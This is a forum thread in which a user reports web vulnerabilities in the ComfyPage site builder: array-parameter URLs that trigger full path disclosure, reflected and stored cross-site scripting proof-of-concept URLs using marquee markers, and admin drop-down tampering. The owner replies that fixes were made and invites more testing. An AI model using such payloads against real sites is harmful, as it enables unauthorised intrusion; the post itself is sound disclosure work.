Jump to content

Recommended Posts

Array:

http://www.comfypage.com/index.php?postback=My+ComfyPage+Signup&email[]

 

Array:

http://my.comfypage.com/agentsteal/function.php?function=Appointment%20Request&success[]

 

Array:

http://my.comfypage.com/agentsteal/mail.php?success[]

 

Array:

http://my.comfypage.com/agentsteal/files.php?folder[]

 

Array:

http://www.comfypage.com/index.php?postback=My+ComfyPage+Signup&password[]

 

Array:

http://www.comfypage.com/index.php?postback=Mailing+List&list_email[]

 

Array:

http://www.comfypage.com/index.php?content_id=2&postback=Contact+Form&email[]

 

Cross Site Scripting:

http://www.comfypage.com/index.php?postback=My+ComfyPage+Signup&email="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.comfypage.com/index.php?postback=My+ComfyPage+Signup&password="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.comfypage.com/index.php?postback=Mailing+List&list_email="><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://my.comfypage.com/agentsteal/function.php?function=Appointment Request&success=<marquee><h1>vulnerable

 

Cross Site Scripting:

http://my.comfypage.com/agentsteal/mail.php?success=<marquee><h1>vulnerable

 

Cross Site Scripting:

There is Cross Site Scripting on http://my.comfypage.com/agentsteal/function.php?function=Mailing List if the fields contain </textarea>code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://my.comfypage.com/agentsteal/files.php if a folder contains ">code.

 

Cross Site Scripting:

There is Cross Site Scripting if your email address contains ">code.

 

Cross Site Scripting:

There is Cross Site Scripting when you contact support if your email address contains ">code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://my.comfypage.com/agentsteal/register_with_existing_domain.php if the domain contains ">code.

 

Cross Site Scripting:

There is Cross Site Scripting when you contact support if your message contains </textarea>code.

 

Cross Site Scripting:

There is Cross Site Scripting when you add a product if the fields contain code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://my.comfypage.com/agentsteal/function.php?function=Appointment Request if the fields contain ">code.

 

Cross Site Scripting:

http://www.comfypage.com/index.php?content_id=2&postback=Contact+Form&email="><marquee><h1>vulnerable</marquee>

 

Drop Down Menu:

If you edit the drop down menus on http://my.comfypage.com/agentsteal/admin.php you can submit arbitrary values.

 

Full Path Disclosure:

http://my.comfypage.com/agentsteal1/admin.php?copy

Warning: array_keys() [function.array-keys]: The first argument should be an array in /home/camand/etc/code_base/working_version/common/settings.php on line 196

 

Warning: array_keys() [function.array-keys]: The first argument should be an array in /home/camand/etc/code_base/working_version/common/settings.php on line 196

 

Warning: Cannot modify header information - headers already sent by (output started at /home/camand/etc/code_base/working_version/common/settings.php:196) in /home/camand/etc/code_base/working_version/admin.php on line 109

 

Full Path Disclosure:

http://www.comfypage.com/index.php?content_id=2&postback=Contact+Form&message[]

Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/camand/etc/code_base/working_version/common/contentServer/functions/Contact Form/Contact Form.php on line 138

 

Full Path Disclosure:

There is Full Path Disclosure on http://my.comfypage.com/agentsteal/register_confirm.php when you submit the form.

Warning: require_once(common/general_settings.php) [function.require-once]: failed to open stream: No such file or directory in /home/camand/etc/code_base/working_version/common/globals.php on line 408

 

Fatal error: require_once() [function.require]: Failed opening required 'common/general_settings.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/camand/etc/code_base/working_version/common/globals.php on line 408

 

Full Path Disclosure:

http://my.comfypage.com/agentsteal/margins.php?edit[]

Warning: Illegal offset type in /home/camand/etc/code_base/working_version/common/contentServer/content_page.php on line 126

 

Warning: Illegal offset type in /home/camand/etc/code_base/working_version/common/contentServer/content_page.php on line 126

 

Warning: Illegal offset type in /home/camand/etc/code_base/working_version/common/contentServer/content_page.php on line 126

 

Full Path Disclosure:

http://my.comfypage.com/agentsteal/function.php

Fatal error: Call to a member function validate_doodad_settings() on a non-object in /home/camand/etc/code_base/working_version/function.php on line 112

 

Full Path Disclosure:

http://my.comfypage.com/agentsteal/files.php?folder=a

Warning: dir(site/UserFiles/a) [function.dir]: failed to open dir: No such file or directory in /home/camand/etc/code_base/working_version/common/file.php on line 34

 

Fatal error: Call to a member function read() on a non-object in /home/camand/etc/code_base/working_version/common/file.php on line 36

Thank you for your help. I've made some changes that cover what you've found. If you would like to try it again I'd be grateful.

 

And to anyone else. If you want to test ComfyPage and find the problems with it then please do at http://comfypage.com.

 

You can sign up for a free website there.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.